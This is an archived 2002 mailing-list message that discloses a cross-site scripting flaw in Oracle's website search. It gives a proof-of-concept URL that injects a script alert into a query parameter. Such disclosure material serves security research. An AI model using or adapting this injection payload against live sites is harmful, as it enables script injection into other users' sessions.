Re: Oracle Databases Allow HTML/SQL injection

From: KF (dotslash@snosoft.com)
Date: 04/16/02


Date: Tue, 16 Apr 2002 11:58:17 -0700
From: KF <dotslash@snosoft.com>
To: david evlis reign <davidreign@hotmail.com>

Looks like we stumbled on the same thing... Snosoft was gonna send this
out with our april fools stuff...

--- Begin Forwarded message ----

On Mon, 1 Apr 2002, l0rt wrote:
> dots cross site scripting of oracle baby... ;o) ain't he sexy.
> -l0rt-

> > HEH
> >
> > http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
> >
> > -KF



Relevant Pages

  • [OT] The oracle on child rearing
    ... The Internet Oracle has pondered your question deeply. ... We just had a baby and worry that we are being bad parents. ... Have a soothsayer check out the kid early in life. ...
    (alt.smokers.cigars)
  • Oracle Forms Cross site Scripting in (iFcgi60.exe / f60servlet)
    ... Oracle Forms Cross site Scripting in (iFcgi60.exe / f60servlet) ... Oracle Forms is a tool ... This could be exploited to conduct cross site scripting attacks. ... Attackers can run arbitrary ...
    (Bugtraq)
  • Oracle Application Server 10g Cross Site Scripting Vulnerability
    ... Oracle AS Portal is a Web-based application for building and deploying portals. ... A vulnerability has been identified in Oracle Application Server 10g, ... This could be exploited to conduct cross site scripting attacks. ...
    (Bugtraq)